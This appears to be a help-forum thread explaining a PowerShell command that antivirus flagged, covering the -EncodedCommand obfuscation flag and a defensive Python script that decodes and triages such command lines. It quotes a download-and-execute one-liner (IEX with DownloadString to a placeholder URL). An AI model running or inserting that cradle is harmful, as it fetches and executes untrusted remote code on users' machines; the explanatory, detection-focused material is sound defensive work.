Tags: powershell, base64, malware, virus-scanning

Suspicious PowerShell Command


My antivirus keeps alerting me with the below-mentioned PowerShell command. I'm a bit familiar with PowerShell but can't understand what the below PowerShell script does. Also, most importantly, I want to know what the "-e" parameter used in the command line is.

SUSPICIOUS COMMAND LINE:

powershell -e sqbfafgakaboaguadwatae8aygbqaguaywb0acaatgblahqalgbxaguaygbdagwaaqbl

SUSPICIOUS SCRIPT:

IEX(New-Object Net.WebClient).DownloadString('https://example.org/xmpsdh')


Solution

As for the script:

IEX((New-Object Net.WebClient).DownloadString('https://example.org/xmpsdh')) downloads a string from the given URL and tries to execute it as a PowerShell command, via IEX, the built-in alias for the (generally to be avoided) Invoke-Expression cmdlet.

In other words: it downloads unknown PowerShell commands from a website and executes them.

As for the command line:

-e is short for the PowerShell CLI's -EncodedCommand parameter, which accepts commands as Base64-encoded strings.

The purpose of this parameter is to enable robust passing of complex command strings without running into problems with quoting and escaping.

However, malware uses the parameter as an obfuscation technique: you cannot easily tell what the command is doing.

Example:

    # -e is short for -EncodedCommand
    powershell -e RwBlAHQALQBEAGEAdABlACAALQBGAG8AcgBtAGEAdAAgAHkAeQB5AHkA

is the equivalent of:

    powershell -Command "Get-Date -Format yyyy"

You can decode a given Base64-encoded argument as follows:

    $base64 = 'RwBlAHQALQBEAGEAdABlACAALQBGAG8AcgBtAGEAdAAgAHkAeQB5AHkA'
    # -> 'Get-Date -Format yyyy'
    [Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($base64))

Conversely, if you want to Base64-encode a string for -EncodedCommand:

    $command = 'Get-Date -Format yyyy'
    # -> 'RwBlAHQALQBEAGEAdABlACAALQBGAG8AcgBtAGEAdAAgAHkAeQB5AHkA'
    [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($command))
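The same decoding steps, turned into a small triage script as an added example (this is not code from the question or the answer): given a logged command line, it locates the -e / -EncodedCommand argument, Base64-decodes it, checks that the bytes really are UTF-16LE text before trusting the result, and lists download-and-execute markers such as IEX and DownloadString found in the decoded text. The sample command lines are constructed from the values on this page; the marker list is an assumption. Note that the blob in the question appears to have been lower-cased by whatever logged it, and since Base64 is case-sensitive that copy no longer decodes to text, which is exactly the failure mode the UTF-16LE check reports instead of returning garbage.

```python
import base64
import shlex

# Constructed samples built from the values on this page (not a real incident log):
# the answer's benign example and the question's blob as the antivirus reported it.
SAMPLES = {
    "benign": "powershell -e RwBlAHQALQBEAGEAdABlACAALQBGAG8AcgBtAGEAdAAgAHkAeQB5AHkA",
    "av_alert": "powershell -e sqbfafgakaboaguadwatae8aygbqaguaywb0acaatgblahqalgbxaguaygbdagwaaqbl",
}
# Markers typical of download-and-execute one-liners (assumed list; extend as needed).
SUSPICIOUS = ("iex", "invoke-expression", "downloadstring", "webclient", "frombase64string")


def encode_command(command: str) -> str:
    """Produce a -EncodedCommand value the way PowerShell expects it: UTF-16LE, then Base64."""
    return base64.b64encode(command.encode("utf-16-le")).decode("ascii")


def find_encoded_argument(cmdline: str):
    """Return the value after -e / -ec / -enc / -EncodedCommand (any prefix of the name), or None."""
    tokens = shlex.split(cmdline)
    for flag, value in zip(tokens, tokens[1:]):
        name = flag[1:].lower() if flag[:1] in ("-", "/") else ""
        if name and "encodedcommand".startswith(name):
            return value
    return None


def decode_encoded_command(blob: str) -> dict:
    """Base64-decode the blob and only accept it if the bytes look like UTF-16LE text."""
    try:
        raw = base64.b64decode(blob, validate=True)
    except ValueError:
        return {"text": None, "reason": "not valid Base64"}
    high = raw[1::2]  # every second byte is 0x00 when an ASCII command is stored as UTF-16LE
    if not high or high.count(0) / len(high) < 0.9:
        return {"text": None, "reason": "decoded bytes are not UTF-16LE text (blob truncated or case-mangled?)"}
    return {"text": raw.decode("utf-16-le", errors="replace"), "reason": ""}


def triage(cmdline: str) -> dict:
    """Decode the encoded argument of a command line and list the suspicious markers it contains."""
    blob = find_encoded_argument(cmdline)
    if blob is None:
        return {"encoded": False, "text": None, "indicators": [], "reason": "no -EncodedCommand argument"}
    result = decode_encoded_command(blob)
    found = [m for m in SUSPICIOUS if m in (result["text"] or "").lower()]
    return {"encoded": True, "text": result["text"], "indicators": found, "reason": result["reason"]}


if __name__ == "__main__":
    # Re-encode the question's script ourselves to show what a correctly logged blob yields.
    script = "IEX(New-Object Net.WebClient).DownloadString('https://example.org/xmpsdh')"
    SAMPLES["reencoded"] = "powershell -EncodedCommand " + encode_command(script)
    for label, cmdline in SAMPLES.items():
        print(label, triage(cmdline))
```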